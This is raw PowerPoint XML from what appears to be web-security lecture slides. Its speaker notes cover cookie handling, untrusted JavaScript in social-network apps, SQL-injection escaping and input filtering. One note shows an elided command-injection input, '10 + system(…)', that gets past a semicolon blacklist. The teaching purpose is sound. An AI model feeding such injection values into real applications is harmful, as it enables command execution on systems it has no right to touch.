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5.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91" r:id="rId2"/>
    <p:sldMasterId id="2147483705" r:id="rId3"/>
    <p:sldMasterId id="2147483717" r:id="rId4"/>
    <p:sldMasterId id="2147483731" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId103"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId104"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="406" r:id="rId6"/>
    <p:sldId id="814" r:id="rId7"/>
    <p:sldId id="686" r:id="rId8"/>
    <p:sldId id="687" r:id="rId9"/>
    <p:sldId id="503" r:id="rId10"/>
    <p:sldId id="664" r:id="rId11"/>
    <p:sldId id="665" r:id="rId12"/>
    <p:sldId id="666" r:id="rId13"/>
    <p:sldId id="684" r:id="rId14"/>
    <p:sldId id="668" r:id="rId15"/>
    <p:sldId id="669" r:id="rId16"/>
    <p:sldId id="803" r:id="rId17"/>
    <p:sldId id="672" r:id="rId18"/>
    <p:sldId id="673" r:id="rId19"/>
    <p:sldId id="674" r:id="rId20"/>
    <p:sldId id="675" r:id="rId21"/>
    <p:sldId id="677" r:id="rId22"/>
    <p:sldId id="676" r:id="rId23"/>
    <p:sldId id="681" r:id="rId24"/>
    <p:sldId id="683" r:id="rId25"/>
    <p:sldId id="682" r:id="rId26"/>
    <p:sldId id="775" r:id="rId27"/>
    <p:sldId id="815" r:id="rId28"/>
    <p:sldId id="776" r:id="rId29"/>
    <p:sldId id="777" r:id="rId30"/>
    <p:sldId id="778" r:id="rId31"/>
    <p:sldId id="779" r:id="rId32"/>
    <p:sldId id="780" r:id="rId33"/>
    <p:sldId id="781" r:id="rId34"/>
    <p:sldId id="782" r:id="rId35"/>
    <p:sldId id="783" r:id="rId36"/>
    <p:sldId id="784" r:id="rId37"/>
    <p:sldId id="785" r:id="rId38"/>
    <p:sldId id="786" r:id="rId39"/>
    <p:sldId id="787" r:id="rId40"/>
    <p:sldId id="788" r:id="rId41"/>
    <p:sldId id="791" r:id="rId42"/>
    <p:sldId id="792" r:id="rId43"/>
    <p:sldId id="793" r:id="rId44"/>
    <p:sldId id="794" r:id="rId45"/>
    <p:sldId id="795" r:id="rId46"/>
    <p:sldId id="796" r:id="rId47"/>
    <p:sldId id="797" r:id="rId48"/>
    <p:sldId id="798" r:id="rId49"/>
    <p:sldId id="799" r:id="rId50"/>
    <p:sldId id="800" r:id="rId51"/>
    <p:sldId id="801" r:id="rId52"/>
    <p:sldId id="584" r:id="rId53"/>
    <p:sldId id="802" r:id="rId54"/>
    <p:sldId id="688" r:id="rId55"/>
    <p:sldId id="689" r:id="rId56"/>
    <p:sldId id="690" r:id="rId57"/>
    <p:sldId id="691" r:id="rId58"/>
    <p:sldId id="692" r:id="rId59"/>
    <p:sldId id="693" r:id="rId60"/>
    <p:sldId id="694" r:id="rId61"/>
    <p:sldId id="695" r:id="rId62"/>
    <p:sldId id="696" r:id="rId63"/>
    <p:sldId id="697" r:id="rId64"/>
    <p:sldId id="700" r:id="rId65"/>
    <p:sldId id="701" r:id="rId66"/>
    <p:sldId id="702" r:id="rId67"/>
    <p:sldId id="703" r:id="rId68"/>
    <p:sldId id="705" r:id="rId69"/>
    <p:sldId id="715" r:id="rId70"/>
    <p:sldId id="716" r:id="rId71"/>
    <p:sldId id="717" r:id="rId72"/>
    <p:sldId id="718" r:id="rId73"/>
    <p:sldId id="726" r:id="rId74"/>
    <p:sldId id="727" r:id="rId75"/>
    <p:sldId id="728" r:id="rId76"/>
    <p:sldId id="729" r:id="rId77"/>
    <p:sldId id="730" r:id="rId78"/>
    <p:sldId id="731" r:id="rId79"/>
    <p:sldId id="732" r:id="rId80"/>
    <p:sldId id="733" r:id="rId81"/>
    <p:sldId id="734" r:id="rId82"/>
    <p:sldId id="804" r:id="rId83"/>
    <p:sldId id="663" r:id="rId84"/>
    <p:sldId id="542" r:id="rId85"/>
    <p:sldId id="770" r:id="rId86"/>
    <p:sldId id="771" r:id="rId87"/>
    <p:sldId id="772" r:id="rId88"/>
    <p:sldId id="773" r:id="rId89"/>
    <p:sldId id="774" r:id="rId90"/>
    <p:sldId id="813" r:id="rId91"/>
    <p:sldId id="806" r:id="rId92"/>
    <p:sldId id="807" r:id="rId93"/>
    <p:sldId id="808" r:id="rId94"/>
    <p:sldId id="809" r:id="rId95"/>
    <p:sldId id="810" r:id="rId96"/>
    <p:sldId id="811" r:id="rId97"/>
    <p:sldId id="812" r:id="rId98"/>
    <p:sldId id="769" r:id="rId99"/>
    <p:sldId id="611" r:id="rId100"/>
    <p:sldId id="544" r:id="rId101"/>
    <p:sldId id="621" r:id="rId10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9900"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="9999FF"/>
    <a:srgbClr val="009900"/>
    <a:srgbClr val="FF00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7" autoAdjust="0"/>
    <p:restoredTop sz="92554" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="92" d="100"/>
          <a:sy n="92" d="100"/>
        </p:scale>
        <p:origin x="-1336" y="-96"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="66" d="100"/>
        <a:sy n="66" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
    <p:sldLst>
      <p:sld r:id="rId1" collapse="1"/>
      <p:sld r:id="rId2" collapse="1"/>
    </p:sldLst>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="140" d="100"/>
        <a:sy n="140" d="100"/>
      </p:scale>
      <p:origin x="0" y="12036"/>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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/handoutMaster" Target="handoutMasters/handout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slide" Target="slides/slide95.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7" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter"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6388" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>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9" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>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70A61926-2DC5-4891-8960-FD62370D8A91}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2282234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59" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt"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9460" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1260475" y="720725"/>
            <a:ext cx="4800600" cy="36004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75791" y="4559928"/>
            <a:ext cx="5363618" cy="4320861"/>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63" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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55158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2134018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A4721-C72F-4C19-B570-344E3B64DDD7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>1</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pPr defTabSz="965276"/>
            <a:fld id="{FECA9C15-561B-4BB1-94F5-81AFD468D0EE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="965276"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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6610"/>
            <a:fld id="{1C4C3A0A-69B9-427D-B48D-A26349689D6A}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="966610"/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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FF2, Chrome:    HttpOnly cookie can be overwritten to by script    (but cannot be read)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This slide shows another situation, in which a social networking site allows users to build and upload their own applications. If these applications are unrestricted JavaScript that runs on the users browser, then the JavaScript from an application could read user information, act as the user (such as post to other comment walls), or interfere with the site in other ways.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64516" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="966610"/>
            <a:fld id="{160F6800-698E-4ED4-A4B9-A0AAFB4B2E23}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="966610"/>
              <a:t>78</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5540" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="966610"/>
            <a:fld id="{B93D5558-4541-4FB3-A607-BBA6BBFD8CDC}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:pPr defTabSz="966610"/>
              <a:t>81</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6564" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="966610"/>
            <a:fld id="{D3B879EC-FD29-4114-B2B2-7F0C74B30E77}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:pPr defTabSz="966610"/>
              <a:t>82</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7588" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="966610"/>
            <a:fld id="{97A37DF1-B688-4899-B722-68ECE73A484B}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:pPr defTabSz="966610"/>
              <a:t>83</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a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="966610"/>
            <a:fld id="{7954C10D-9CF3-4123-867A-F1B8AC729124}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:pPr defTabSz="966610"/>
              <a:t>84</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9636" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="966610"/>
            <a:fld id="{A04B2123-2D85-49B2-9022-5E13BD43D075}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:pPr defTabSz="966610"/>
              <a:t>85</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Whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:    allow only digits,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> +, -, *, /  in  $in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Blacklisting (bad):   disallow  “;”  in $in    ---    but attacker can do “ 10 + system(…) ”</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FD3FA-7EB7-4B13-9060-943D9E5703F9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260475" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>List of examples keep changing every year.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>These devices also function as SSL terminators to peek into SSL traffic.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CEFCB-E197-4C11-8A46-851C02279434}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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262B3FC-2135-4E26-9C94-50F8F1639012}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>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CD40-DA12-4893-857A-2E2D59A4F097}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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r>
              <a:rPr lang="en-US"/>
              <a:t>This snipet is in VB.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FA74A54-A892-4428-971E-34A2DA7C937B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258888" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84996"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B52C292-C2C7-4F31-A1D1-3E1CA5F9F58B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258888" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94212"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Escaping is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tricky:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  can reintroduce SQL injection vulnerability</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E514-1BC3-4CDD-8A10-6C1AF9A233ED}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1307650" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1307651" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Escapes with \.     ‘ -&gt; \’   .     DB independent  ---  different DB’s have different rules for escaping.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This snipet is in 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9058" name="Group 1026"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="4320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1069059" name="Group 1027"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5760" cy="4320"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5760" cy="4320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069060"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1069061" name="Group 1029"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="5760" cy="4320"/>
                <a:chOff x="0" y="0"/>
                <a:chExt cx="5760" cy="4320"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1069062"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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1069113"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1069114" name="Group 1082"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3" y="559"/>
              <a:ext cx="4192" cy="1796"/>
              <a:chOff x="3" y="559"/>
              <a:chExt cx="4192" cy="1796"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069115"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1069116"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1069117"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1069118"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1069119" name="Group 1087"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1480" y="1952"/>
              <a:ext cx="3808" cy="1812"/>
              <a:chOff x="1480" y="1952"/>
              <a:chExt cx="3808" cy="1812"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069120"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1069121"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1069122" name="Arc 1090"/>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1069125" name="Rectangle 1093"/>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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069126" name="Rectangle 109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endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069127" name="Rectangle 1095"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162800" y="6400800"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C6C4C56B-C304-4C75-B5AB-3932B4AB3FD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68ED6F-3C3A-4BD7-8BA3-86E57836DD0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C70BA0-01BC-4F70-94D9-EF35BA7F764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lgn="l"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rtl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{29E6B40F-E18C-4508-A485-99A2C5332EE7}" type="slidenum">
              <a:rPr lang="en-GB" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr rtl="0" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" kern="1200">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"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B90E5FC-6F73-4FB4-A697-0B9762ADA319}"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a:xfrm>
            <a:off x="7162800" y="6400800"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0A84A61C-B044-46DD-BA8E-6378D8153B65}"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0F6EDF5B-CE31-472F-82A7-D6119DC81219}"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sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DD340A0A-AB8B-40F5-9B87-6FB4D21BE0A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sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{45C733D8-7256-45A1-8756-987371482E5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4062E6-0B63-4CDF-9F0E-6E03406585A8}"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sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00DE8B12-F71D-49CD-AA27-C1CCD28323CE}"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sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{671857E4-A199-452A-8860-595529EBB88A}"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7ACA9177-2F1F-44E7-84DA-ADFD13715FFB}"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E7238E29-5E59-498F-9410-860CFCD70F87}"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BA293FC6-C5B9-454A-8A82-ACC5C683CDE7}"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7C521416-25BA-4029-B821-8334EC92D5A9}"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1AECC46B-A6AA-49DD-8BB5-D6F6A3C0EEEB}"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solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>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solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>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fld id="{9087C74D-BE61-4172-A4D5-55D87883D978}" type="slidenum">
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="40458C"/>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76629F-7297-4868-87FD-440918B37AF4}"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7ABE521-EBB8-432C-B96F-1FC2A10F5197}"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C48AED5-54A9-4F61-B3D7-DC7EE00B78FD}"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88BAEA8-FC63-4247-9526-73B2A6DFE614}"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D278D2-38CE-4121-851D-643D8E14E71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F9CA2B5-450C-4A09-BD91-356781BA2A1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964064-63B1-4F42-9962-8490834BF0A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8034" name="Group 2"/>
